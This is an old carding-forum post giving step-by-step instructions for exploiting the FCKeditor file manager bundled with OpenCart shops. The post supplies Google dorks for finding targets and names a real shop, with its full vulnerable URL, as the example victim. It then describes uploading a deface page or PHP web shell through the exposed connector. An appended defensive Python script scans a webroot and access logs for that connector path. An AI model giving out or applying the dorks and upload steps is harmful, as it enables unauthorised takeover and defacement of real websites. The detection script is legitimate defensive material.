How to upload Deface Remotely



CardingMafia Admin
03-28-2012, 09:59 AM
This method is also known as the OpenCart CMS (web shop) exploit. It's an old vulnerability, but many people don't know this, so I'm publishing a tutorial here.

1- Open Google.com and enter the dork:


inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or

nurl:Powered By OpenCart
You'll get a lot of websites from Google; select any one. For example, I got this one:
School Shopper Home Page (http://www.schoolshopper.com.au/)
Then I'll simply add the vuln URL after the website

Example
FCKeditor - Connectors Tests (http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

(The path may be changed on other websites, e.g. Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a page will open like this

http://4.bp.blogspot.com/-lidWGvNV1vA/TosW8ZqPi1I/AAAAAAAAAIQ/iL_Bz-Lc_z4/s640/wp1.bmp

Now see the connector option, which is on the top left side of the page. Change the connector to PHP (see the image below)

http://2.bp.blogspot.com/-JD7gM3NbpD0/TosYS9WnlxI/AAAAAAAAAIU/KK0eGV0U1jY/s400/wp2.bmp

And now see the file upload option and upload your deface or shell,
and for checking the shell or deface, check this URL
www.site.com/deface.html
or
www.site.com/shell.php
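
Added example, not part of the original post: a check a site owner can run against their own OpenCart webroot and access log to find the FCKeditor connector files the post relies on and any requests that reached them. The sample webroot and log lines are constructed, the combined log format is an assumption, and the function names are hypothetical.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Path fragment from the post; the FCKeditor file manager lives under it.
CONNECTORS = "fckeditor/editor/filemanager/connectors"
# Combined log format (assumed): client, [timestamp], "METHOD path PROTO", status
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def find_connector_files(webroot):
    """Web-relative paths of every file under an FCKeditor connectors directory."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        rel = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        if CONNECTORS in rel.lower():
            hits.extend(f"{rel}/{name}" for name in files)
    return sorted(hits)

def connector_requests(log_lines):
    """(client, method, status) for each logged request touching the connectors path."""
    out = []
    for line in log_lines:
        m = REQ.match(line)
        if not m:
            continue
        path = unquote(m.group(3)).lower()  # catch %-encoded and mixed-case variants
        if CONNECTORS in path:
            out.append((m.group(1), m.group(2), int(m.group(4))))
    return out

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Mar/2012:09:59:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Mar/2012:10:01:13 +0000] "GET /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 4096',
    '203.0.113.9 - - [28/Mar/2012:10:01:40 +0000] "GET /abc/admin/view/javascript/FCKeditor/editor/filemanager/connectors/test.html HTTP/1.1" 404 310',
]

def demo():
    with tempfile.TemporaryDirectory() as root:  # constructed sample webroot
        d = os.path.join(root, "admin", "view", "javascript", *CONNECTORS.split("/"))
        os.makedirs(d)
        open(os.path.join(d, "test.html"), "w").close()
        open(os.path.join(root, "index.php"), "w").close()
        return find_connector_files(root), connector_requests(SAMPLE_LOG)

if __name__ == "__main__":
    files, reqs = demo()
    print("remove or block:", files)
    print("requests to review:", reqs)
```

Any file the first function reports should be deleted or blocked at the web server, and a 200 response in the second function's output means the page was actually served to that client.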